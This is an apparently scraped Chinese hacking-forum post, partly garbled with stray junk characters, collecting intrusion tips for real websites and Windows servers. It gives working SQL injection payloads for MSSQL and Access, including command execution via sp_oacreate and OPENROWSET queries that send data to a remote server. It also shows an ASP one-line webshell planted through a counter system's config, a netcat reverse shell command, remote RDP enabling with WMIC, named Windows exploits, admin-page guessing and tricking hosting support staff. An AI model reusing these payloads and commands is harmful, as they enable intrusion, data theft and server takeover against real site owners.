SA点数据库分离技术相关
4 F, R8 `1 M% q$ P1 t3 V8 e
9 C- `" n5 l7 P9 I
& v" m/ x5 k8 H! n! kSA点数据库分离搞法+语句:
1 ^" B. Z! g8 q- }/ @8 O+ I! K ?4 K% b7 \1 w) l9 z) A2 p
注射点不显错,执行下面三条语句页面都返回正常。
4 @& Z5 |9 W3 Iand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')+ D- C. g3 G6 U) ~2 T2 H8 D, s
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')3 v' g- V: L% O2 o. R3 ?' D
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')7 y% O/ Z- y4 }1 |1 ^" Q/ n/ J
可以列目录,判断系统为2000,web与数据库分离! J$ e+ {9 H0 y, n+ M' ?) Z
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
! M. W! h1 m. E1 I, M8 ^, O5 y* n# H在注射点上执行- ^% Y% f N- g$ R" M/ I8 n
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--2 Q" e- H% |/ }2 A
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
4 m# B5 G3 [3 {& Z" V$ l; f4 Z, T- t8 l还有我用NC监听得其他端口都没有得到IP。9 k( k5 q) Y4 r: s- @
+ {% ^3 K; s [8 N% d- ^
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。0 w; ~' I/ G' q" H3 C* Z
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
- b) _- O/ k. F1 M+ P
z7 t9 T6 [6 B/ @;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--& {7 `0 o* u8 m
% M" a6 T N; p( I0 @3 Z& `
现在就猜想是不是数据库是内网而且不能连外网。# Q- @& e7 L$ b) T4 c
1 j- f( N' h# {1 I5 t$ a, K7 }2 U& l+ b A, `7 s/ B9 w
access导出txt文本代码4 Z. j+ F0 j& }5 C1 I
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
6 }) k0 T: q* o) l' ~
8 ~# D: A5 |4 V+ r! V5 v8 V q
b9 \5 v6 R: s" K% s4 O- y9 ^6 c' h: G8 M9 N2 P) j- Z1 l) a
自动跳转到指定网站代码头" S! d* z6 u" T- S7 U$ l
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
6 Y+ I2 b' g+ f1 ]% c1 e. U7 T i2 z7 o$ X( ^
+ S9 _8 |2 s7 H9 x
入侵java or jsp站点时默认配置文件路径:2 ?: _# G2 P- B
\web-inf\web.xml D8 K+ q4 O/ m* \+ {, Y5 p
tomcat下的配置文件位置:
I% m) X7 k3 j/ x( _( P( r\conf\server.xml (前面加上tomcat路径): c9 d$ ^1 O2 F; F" B
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml6 c1 w8 @& J8 n+ S# F6 V5 N( x
. F2 o$ D+ _' g* _
( q' i% J0 |* x# D6 Y( Q! X
+ I2 D$ j; k2 q4 N: K S& y
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
% r3 O6 ?; g" d v9 D: S-1%237 F( C5 A8 ` W) X7 T- P
>
7 ]0 q) A; e6 P# ^; y5 y% i" l7 A; D<
$ E- M4 {* R' |1 T4 K1'+or+'1'='1/ s0 K. @5 a, K
id=8%bf
5 ~8 L3 `0 C" Z7 e$ G- v
+ h. W8 `8 L+ ?8 |6 \# A* q全新注入点检测试法:2 _$ Z/ F' h% B8 m5 e9 f$ U6 [
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。$ [/ a; H* m( I& U3 Z9 Y+ I
) m4 u7 t: x$ Z/ h在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
! o" l% T2 F, w9 d4 y
4 h7 S2 S" K1 R: ~8 `' e, ?搜索型注入判断方法:. d6 G/ B/ Z6 R$ c
北京%' and '1'='1' and '%'='
# @7 v7 {$ v" Y/ V' ]+ J. }; q北京%' and '1'='2' and '%'='
6 }% h6 W' a$ k" v
; h5 o! [+ Y4 n p
( b" k/ H" H, A" l6 L9 w! b! yCOOKIES注入:
3 A0 Y) i' }" K+ E9 J
% i i6 s; q- Q* Z6 ijavascript:alert(document.cookie="id="+escape("51 and 1=1"));
8 x) `' n6 [. L2 d3 p
' ~8 i' h: O5 ~ d. L z: G) Y2000专业版查看本地登录用户命令:5 s; `( I, e# Q7 T
net config workstation7 O2 S3 w* [ d. s" S
% ^% T6 `- O' G, D2 ]2 ^4 i& R+ H
8 ^* q: t3 _& D+ ]2003下查看ipsec配置和默认防火墙配置命令:
% W1 u$ U. ]2 o9 ]0 n1 u1 [netsh firewall show config) j3 @- m+ T+ [/ U% \
netsh ipsec static show all4 a0 |! q( b' o
/ [ P( ^: V" |) s不指派指定策略命令:+ }5 F; u% S( e5 A* l9 U& s
netsh ipsec static set policy name=test assign=n (test是不指派的策略名)
7 d( @7 ~& S# I d( @0 Y' C& gnetsh ipsec static show policy all 显示策略名
, t5 g, R' a1 x4 f; R5 x( U* E0 }$ \; A: O1 M
' I6 o2 b& s* j7 l" y( g' c, ]猜管理员后台小技巧:. s) _5 v: O( d6 Y7 n' }
admin/left.asp ' v' K' D# D$ o* @+ C, \# F
admin/main.asp
" ]4 F7 L2 S% b3 t1 Z1 z& D. N" Oadmin/top.asp% a5 g8 ?& `9 G9 G
admin/admin.asp - H* a# k' l) v2 s. ?' E% ^
会现出菜单导航,然后迅雷下载全部链接* Z% |2 K# I- I
. A; T+ q; h @' G" ~+ c
4 [/ `4 E5 d2 [0 _3 h% |社会工程学:; |1 T. r- m, g
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人8 u; L2 w# s* `0 d
然后去骗客服
0 D0 ^$ r9 G! j1 R: r3 K
- E- V7 C: @. J3 O1 ]( h# z' E7 B. u. S3 i2 |9 b
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
; E7 d: q9 p v c, z. q查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, - a' s' U6 Z/ Q
存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。" a, }3 y2 q4 b0 M7 f
6 L D; s; F6 D! \" l" {3 Q# O
4 G8 S; p$ ^; H5 R; f9 X/ Y: g) v$ e, [+ A% U0 W3 A
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
! e D6 C* ~ f$ k/ {) E; h
0 b) L0 O0 e' m0 h4 N
' U& ]% H+ [/ y9 f4 L) K' z8 R4 Q- \( `) l( k
CMD加密注册表位置
6 x8 @- X' w/ U& t* _(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
; {' G8 _- h6 c% |' ?AutoRun
( H [: X4 A/ b7 h" N* a% w0 P$ |3 I$ ?
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor% h5 l: B4 G5 A' c
AutoRun. y2 ] d. s5 _3 h
$ j* u& J& M) [% Z5 K8 D8 {
+ T9 ^0 }% f; O! o
在找注入时搜索Hidden,把他改成test2 h8 m- `" Z9 D5 d% ?8 D
* L9 U( D" [1 z6 ?0 M3 P4 O5 b# R9 R1 d( K
2 o* g; I" j1 [8 D1 c+ \2 P5 c
mstsc /v:IP /console
0 y+ o7 m/ [* G7 V% t0 K( E* q
3 t+ Y' k9 I1 c7 u0 [9 C
. ?8 z |6 y6 x" m. U一句话开3389:) H* A2 [$ F, l4 F
# J4 M% [9 i+ ]" u7 ^: U
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH> / {5 v e5 O) ]. X
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
6 _1 a8 I1 d$ ]) [& F; V: P& Z) {' M( u: f$ V0 w3 ^
5 X0 P; y; B6 D+ N知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:1 W2 n2 x" k% v. L2 G
Insert into admin(user,pwd) values('test','test')9 f% m7 t& }3 I+ I/ H) s
4 @9 D1 n( n1 q- i9 L L
. m# N# u0 Y+ fNC反弹* ^) B( w: o4 y
先在本机执行: nc -vv -lp 监听的端口 (自己执行) # P1 U8 x, N- R$ y
然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
2 `' [' l/ K& l- {% x8 _! ?
& a, j A" ^) Z. P( ]/ W3 U6 M6 [' D) b* i9 \ r/ b, A
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
2 ]# T; N2 L* X' A" K& c x' @+ Q0 Z0 v' v, }
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
' J& o" w! V, G例如:
7 i9 V. D/ K$ _, I4 ^subst k: d:\www\ 用d盘www目录替代k盘
3 I( n. t# T4 O& I8 `2 R1 [subst k: /d 解除K盘代替 |
匿名
发表于 2017-12-20 02:36:51
发表于 2012-9-15 14:41:29
收藏
支持
反对